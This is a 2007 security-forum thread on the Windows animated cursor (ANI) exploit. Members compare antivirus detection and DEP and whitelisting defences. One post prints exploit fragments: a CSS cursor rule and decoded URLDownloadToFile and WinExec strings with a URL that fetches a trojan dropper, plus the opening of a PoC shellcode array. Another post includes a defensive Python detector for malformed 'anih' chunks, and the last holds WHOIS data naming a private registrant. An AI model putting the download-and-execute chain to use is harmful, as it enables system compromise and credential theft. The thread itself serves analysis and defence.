Vulnerability in Windows Animated Cursor Handling

Discussion in 'other security issues & news' started by ronjor, Mar 29, 2007.

Thread Status:
Not open for further replies.
  1. ThunderZ

    ThunderZ Registered Member

    Joined:
    May 1, 2006
    Posts:
    2,459
    Location:
    North central Ohio, U.S.A.
Checked it out running 2k & IE6, NOD32 stopped it dead in its tracks.
     
  2. Firecat

    Firecat Registered Member

    Joined:
    Jan 2, 2005
    Posts:
    8,206
    Location:
    The land of no identity :D
Microsoft might have known about these vulnerabilities from back in December, but I was even more surprised to find one corrupt sample which was from 2006 (according to my source, anyway) and was actually using the ANI exploit (or at least that is what Ewido, AntiVir, BitDefender, QuickHeal and ClamAV say). Though my particular sample was corrupt, it is still detected by certain scanners as being infected, and this creates a cause for concern as it would seem that malware using this exploit may well have been around for a while now. :eek:

    As for detection of the ANI exploit, IMO the AVs with the best detection for such threats (including zero day protection) are BitDefender, NOD32 and Norman. Kaspersky is adding signatures for each variant instead of using generics, and hence ranks behind BD, NOD and Norman. I have two files using this exploit with me, I am checking them now to see who is detecting them.

    EDIT: it seems most good AVs are adding this malware now.
     
    Last edited: Apr 2, 2007
  3. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    3,112
    Location:
    Slovakia
  4. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
McAfee VirusScan Enterprise 8.5.0i
DATs version 4997.0000
Sorry for the large image. Resize if necessary.
     


    Last edited by a moderator: Apr 2, 2007
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    Has anyone analyzed this exploit?

It's just another means to attempt to download a trojan.

    So, how do you prevent downloading of unauthorized executables?

1) One site notes that using WinXP Pro with DEP (Data Execution Prevention) enabled blocks the exploit.

    2) Anyone using SRP (Software Restriction Policies) would block.

    3) Any other program with execution prevention would block.

The above are White List solutions - preferable for Zero-day prevention, since Black List solutions (AV, etc.) aren't effective until the infected file is entered into the database.

    sans.org noted a couple of days ago,

    From an article on White List solutions:

    Analysis

    This exploit is similar to the .ani file exploit from two years ago. See Microsoft Security Bulletin MS05-002

    The code embedded in a web page cached a .ani file:


Code:
<style>

* {CURSOR: url("./exp_2/1.ani");}

</style>

.........

GetProcAddress-LoadLibrary-GetSystemDirectory-
urlmon.dll-URLDownloadToFile-WinExec-
HTTP: / / 195.225.177.33/vx/win32.exe
    
    win32.exe was the dropper - easily blocked by any of the above White List solutions before the patch was released.

    From some sites posted elsewhere:

    ZERT's blog points out that the MS patch for the above exploit did not include another vulnerability present in the code:

    I haven't seen a file in the wild, but a POC shows:

    Code:
    /* ANI Header */ 
    unsigned char uszAniHeader[] =
    
    ......
    
    /* Shellcode - metasploit exec calc.exe ^^ */ 
    unsigned char uszShellcode[] = 
    "\xeb\x03\x59\xeb\x05\xe8\xf8\
    
    A malware author would substitute any of these for calc.exe

    Conclusion

    A valid threat, yes, but should not invoke "emergency mode" for those with proper protection.


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
     
  6. Mele20

    Mele20 Former Poster

    Joined:
    Apr 29, 2002
    Posts:
    2,495
    Location:
    Hilo, Hawaii
Have you tried downloading the POC from http://seclists.org/fulldisclosure/2007/Mar/0569.html using IE? Download the file and if you try this without an AV that is protecting you, you will be in for a nice surprise even if you have hardware DEP set to Opt Out. Be sure to NOT download the file to the desktop... preferably to some isolated new folder or temp folder. Then try using Explorer and go to the download location. Explorer will crash and if downloaded to the desktop, Explorer will enter a crash/restart loop. You'll need to use a command window to delete the file. Or now with AV protecting you can turn on your AV, but when I did this test, Avira was not yet protecting. Much of what you quoted is old, outdated, inaccurate information. Probably your best bet for current, accurate information is the GRC Security NG.
     
  7. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
  8. Mele20

    Mele20 Former Poster

    Joined:
    Apr 29, 2002
    Posts:
    2,495
    Location:
    Hilo, Hawaii
    You have Opt IN or Opt OUT for hardware DEP status?

    So, you ran the test and what? Avira popped up, I assume.

    It is the seclists.org one that is nasty if you download it. Change the link to "test.ani" instead of test.html.
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    Hi Mele,

I did - I don't have an AV, nor DEP here on Win2k. Nothing happened except the BOO! alert using both IE6 and Opera. I let the test.ani file cache, and then I downloaded it directly, and nothing happens.

    While PoCs are useful, only the real thing lets you know what is really going on. Unfortunately, every site I've seen referenced with the exploit is either down, or has been sanitized. A friend is also searching, but she has found nothing that works.

    I'm not sure what you mean. I've seen the GRC group (and your posts there). Unfortunately, there isn't really much information about how the exploit works - just running around trying to figure out how to delete the test.ani file.

Evidently this PoC needs WinXP SP2 to work, and my laptop with XP doesn't have Deep Freeze installed, so I don't test on that machine.

My desktop system with Win2K does have Deep Freeze so I just reboot to clear all cached and downloaded files during that session.

    There is a link at GRC to a pdf file which is another confirmation of the Chinese site analysis that I referenced in my previous post:

    Analysis of ANI "anih" Header Stack Overflow Vulnerability
    http://www.mnin.org/write/ani-notes.pdf

    My point is that ultimately, the aim of the *.ani file (or other extensions that it might use) is to download an executable, and this is what security-minded people should be concerned about. If it messes up other things on your computer, a restore, re-image, rollback, or reboot-to-restore will take care of the mess.

    The previous *.ani exploit in 2005 I referenced, also downloaded an executable. Below is a screen shot showing it being blocked. Notice the *.ani file in the status bar, being cached, immediately attempting to download the executable (code listed in previous post). The current exploit will attempt something similar, as noted in my two references, one here, and one in previous post.


    best regards,

    -rich
     

    Attached Files:

• ani.gif (File size: 28.9 KB, Views: 422)
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    OK, my friend found one. It's the mm.jpg file mentioned in the pdf file - I was getting ready to look for it but she beat me to it.

    Notice the last line in the code (screenshot below): calling out to download an executable.

    This is my point: no matter the obfuscation, sophistication of the exploit code, the money is made when a system permits a trojan/dropper to download.

    The file doesn't run here - it may require XP.

    I will download the executable later and scan it at VirusTotal to see what shows.


    regards,

    -rich
     

    Attached Files:

• jpg.gif (File size: 14.2 KB, Views: 411)
  11. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,924
    Location:
    SW. Oklahoma
Went to the site to test IE for the vulnerability but McAfee Internet Security nabbed it first.
     


  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,989
    Location:
    California
    I downloaded the xx.exe file and most AV identified it as a PWS (password stealing) trojan.

    Note that the file embedded on the web site is a *.jpg file [mm.jpe] - identified by most AV by now as the ani.exploit. But the extension doesn't matter, since the code is an RIFF file. See:

    http://www.daubnet.com/formats/ANI.html

    Executing xx.exe installs bdscheca001.dll. This is a component of spyware applications:

    -----------------------------------------
    http://www.superantispyware.com/definition/bdscheca001/
    Summary of BDSCHECA001.DLL
    Spyware.PWS/Check Variant.ShellExecuteHook

    Description of BDSCHECA001.DLL
    File component of a password/information stealing trojan.
    Observed file name may vary
    -----------------------------------------

    It's evidently a popular file with malware writers and was observed two months ago in the javascript code injection exploits:

    "more code injection sites 8.js"
    http://isc.sans.org/diary.html?storyid=2178

    While the PoC demonstrates how Windows Explorer treats these types of files, the looping and all the other stuff it does is misleading IMO because the real exploit's purpose is to download the trojan. That's what you should be concerned about stopping - not detecting the .ani file, which will remain undetected on Zero-day.

Think about it: serious malware writers don't want to call attention that something is amiss. The real exploit will install a trojan surreptitiously, also without being detected at Zero-day, unless blocked by White Listing.

    So, if you understand how the exploit works, you don't have to go into "emergency mode" as the writer stated in the previous article I quoted.

    The problem is -- and I've mentioned this before -- you really have to dig to get a detailed analysis of these exploits (I've found just the two I referenced). Most articles just alert to a vulnerability, and everyone panics that doomsday is upon us. It makes for good sensationalist press, but it's not the whole story, and security-minded people shouldn't take these things at face value.


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
     
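Two points in the posts above are worth turning into a check a defender can actually run: the file extension does not matter because the loader looks at the RIFF content (post #12), and the vulnerability itself lives in the "anih" header chunk (the mnin.org paper title in post #9). The script below is an added example, not code from any poster or from the referenced papers. It walks a RIFF/ACON container by content, ignores the file name entirely, and flags any "anih" chunk whose declared length differs from the 36-byte ANIHEADER structure that Windows copies it into (36 is the documented size of that structure; the assumption here is that any other declared length is malformed and worth alerting on). The sample buffers are constructed inline: one well-formed header and one with a second, oversized "anih" chunk nested in a LIST, which is just a length mismatch and nothing else.

```python
import struct

# sizeof(ANIHEADER): the fixed-size structure an "anih" chunk is copied into.
# Assumption for this detector: a chunk declaring any other length is malformed.
ANIH_EXPECTED_SIZE = 36


def _walk_chunks(data, offset, end, findings, depth=0):
    """Walk RIFF chunks in data[offset:end], descending into LIST chunks.
    Declared sizes are clamped to the buffer, so a lying size field cannot
    push the walker outside the bytes we actually hold."""
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        size = struct.unpack_from("<I", data, offset + 4)[0]
        payload = offset + 8
        payload_end = min(payload + size, end)
        if fourcc == b"anih":
            findings["anih_sizes"].append(size)
            if size != ANIH_EXPECTED_SIZE:
                findings["suspicious"].append(
                    "anih chunk at offset %d declares %d bytes, expected %d"
                    % (offset, size, ANIH_EXPECTED_SIZE))
        elif fourcc == b"LIST" and depth < 8:
            # A LIST payload is a list-type fourcc followed by nested chunks.
            _walk_chunks(data, payload + 4, payload_end, findings, depth + 1)
        # Chunks are 2-byte aligned: an odd-sized payload carries one pad byte.
        offset = payload + size + (size & 1)


def inspect_ani(data):
    """Classify a byte buffer by content, not by file extension.
    Returns whether it is a RIFF/ACON container, every anih size seen,
    and a list of human-readable reasons it looks malformed."""
    findings = {"is_riff_acon": False, "anih_sizes": [], "suspicious": []}
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return findings
    findings["is_riff_acon"] = True
    riff_size = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + riff_size)
    _walk_chunks(data, 12, end, findings)
    return findings


# --- constructed sample data (not real files) -------------------------------

def _chunk(fourcc, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def _riff_acon(body):
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body


# A well-formed ANIHEADER: cbSize, cFrames, cSteps, cx, cy, cBitCount,
# cPlanes, JifRate, flags (nine little-endian DWORDs).
GOOD_ANIH = struct.pack("<9I", 36, 1, 1, 0, 0, 0, 0, 10, 1)

SAMPLE_OK = _riff_acon(_chunk(b"anih", GOOD_ANIH))

# Same container plus a second anih chunk inside a LIST that claims 100 bytes.
SAMPLE_OVERSIZED = _riff_acon(
    _chunk(b"anih", GOOD_ANIH)
    + _chunk(b"LIST", b"fram" + _chunk(b"anih", b"\x00" * 100)))

# JPEG magic followed by filler: a real picture is not a RIFF container.
SAMPLE_NOT_ANI = b"\xff\xd8\xff\xe0" + b"\x00" * 20


if __name__ == "__main__":
    # The file name is deliberately irrelevant to the verdict.
    for name, blob in (("cursor.ani", SAMPLE_OK),
                       ("mm.jpg", SAMPLE_OVERSIZED),
                       ("photo.jpg", SAMPLE_NOT_ANI)):
        result = inspect_ani(blob)
        print(name, "RIFF/ACON:", result["is_riff_acon"],
              "anih sizes:", result["anih_sizes"],
              "suspicious:", result["suspicious"])
```

The walker descends into LIST chunks because a second "anih" header does not have to sit at the top level, and it clamps every declared size to the bytes it holds so that the detector cannot itself be tripped over by a hostile length field. Run it over a mail or proxy quarantine directory and the verdict depends only on the first 12 bytes and the chunk table, which is exactly why renaming the file to .jpg buys the attacker nothing against this kind of check.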
  13. coldplay

    coldplay Registered Member

    Joined:
    Nov 12, 2006
    Posts:
    191
    update for ANI from MS yet?

One of my computers got an autoupdate on Mon. afternoon (EST). It was about 5mb. And my other computer didn't get any updates from MS.
    I am kinda wondering what that update was about.

    BTW, eeye has a patch for .ani. read the article and scroll down for the patch:

    http://research.eeye.com/html/alerts/zeroday/20070328.html
     
  14. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
  15. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
Hi Rmus, what is this software which is giving the alert on your system (post #34)?
     
  16. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
I tried both with DEP enabled partially and fully.
Antivir popped up each time.

I downloaded test.ani (1KB file) from seclists.org and Antivir popped up. Disabled guard and then put it in a test folder. With DEP enabled, nothing happens. Will try after disabling DEP.
Surprisingly I am not able to download this file by IE 6, I get two zero KB files, test.ani and test.ani.temp.
     
  17. eyes-open

    eyes-open Registered Member

    Joined:
    May 13, 2005
    Posts:
    721
  18. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
  19. ASpace

    ASpace Guest

According to this video/demo all browsers are vulnerable. However, it seems that IE7 with Protected mode is more secure than Firefox because with IE7 with Protected mode we cannot overwrite important system files, which is possible with Firefox.
It seems here IE7 > Firefox. Wow :D
     
  20. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    Anti-Executable ;)
     
  21. ronjor

    ronjor Global Moderator

    Joined:
    Jul 21, 2003
    Posts:
    102,268
    Location:
    Texas
    In any event, Microsoft has issued a patch for this exploit as noted in the security bulletin above.
     
  22. ThunderZ

    ThunderZ Registered Member

    Joined:
    May 1, 2006
    Posts:
    2,459
    Location:
    North central Ohio, U.S.A.

    I question that. o_O Visited the page with IE6. Was told I was vulnerable and Nod blocked it. Revisited it with FF 2.0.0.3 and was told I was not vulnerable and received no warning from Nod. :rolleyes:
     
  23. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,152
    Location:
    UK / Pakistan
  24. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    This is the WHOIS info for newasp.com.cn:
Apparently it is addressed to a person named Mr Chen... and some strange Chinese franchise. Beijing technology company/network information center.

    WHOIS results for newasp.com.cn

    Generated by www.DNSstuff.com

Found WHOIS server for .cn: whois.cnnic.net.cn. Looking up.

    Using 6 day old cached answer (or, you can get fresh results).
    Hiding E-mail address (you can get results with the E-mail address).

    Domain Name: newasp.com.cn
    ROID: 20060703s10011s65965947-cn
    Domain Status: ok
    Registrant Organization: 浙江乐清翁洋镇塘下村迎门路
    Registrant Name: 陈银斌
    Administrative Email: *****@hichina.com
    Sponsoring Registrar: 北京万网志成科技有限公司
    Name Server:dns9.hichina.com
    Name Server:dns10.hichina.com
    Registration Date: 2006-07-03 21:37
    Expiration Date: 2007-07-03 21:37

    Page source in FF for newasp.com.cn/xx/exe:
    <html><head><title>Error</title></head><body>ϵͳÕÒ²»µ½Ö¸¶¨µÄÎļþ¡£
    </body></html>

    IP Information - 195.255.177.33
    Generated by www.DNSstuff.com

    IP address: 195.255.177.33
    Reverse DNS: ws33.trailcon.fi.
    Reverse DNS authenticity: [Verified]
    ASN: 719
    ASN Name: ELISA-AS (Elisa Oyj)
    IP range connectivity: 4
    Registrar (per ASN): RIPE
    Country (per IP registrar): FI [Finland]
    Country Currency: EUR [euros]
    Country IP Range: 195.255.0.0 to 195.255.255.255
    Country fraud profile: Normal
    City (per outside source): Unknown
    Country (per outside source): FI [Finland]
    Private (internal) IP? No
    IP address registrar: whois.ripe.net
    Known Proxy? No
    Link for WHOIS: 195.255.177.33
     
    Last edited: Apr 5, 2007